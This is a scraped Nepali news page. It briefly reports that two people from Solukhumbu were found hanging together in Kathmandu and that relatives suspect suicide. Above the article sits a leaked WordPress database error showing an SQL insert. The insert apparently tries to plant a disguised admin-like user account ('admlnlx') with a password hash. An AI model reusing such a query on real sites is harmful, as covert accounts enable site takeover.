WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxZSeanhkceHJUw5vLuylHMC55tG1//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 23:06:43', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २० साउन २०७६, काठमाडौं । सोलुखुम्बुका दुई जना काठमाडौंको कपनमा सँगैं झुन्डिएको अवस्थामा फेला परेका छन् ।
सोलुखुम्बुको सोताङ गाउँपालिकाका ४ नाम्लुङका २१ वर्षे अमिर/चन्द्र नाछिरिङ र माप्य दुधकोशी गाउँपालिकाका ६ निवासी निर्मला खालिङ राई सँगैं झुन्डिएका अवस्थामा फेला परेका हुन् ।
निर्मला आफ्नो छोरी पढाउन काठमाडौं बस्दै आएकी र उनका श्रीमान् भने बैदेशिक रोजगारको कतार रहेको छ । त्यस्तै चन्द्र/अमिर भने एक महिना अगाडि काठमाडौं आई फुपूसँग बसेको उनका आफन्तहरुले बताएका छन् ।
आइतबार साँझ ७ बजेर ३१ मिनेटको समयमा सामाजिक संजाल फेसबुकमा भिम राई सोलु नेपाल नामको फेसबुक आइडीबाट उनीहरुको मुख जोडेको फोटो अपलोड गरिएको थियो । त्यसैकारण उनीहरुले आत्महत्या गरेका मृतकले आफन्तहरुले दाबी गरेका छन् ।
फोटो : परिवर्तन खबर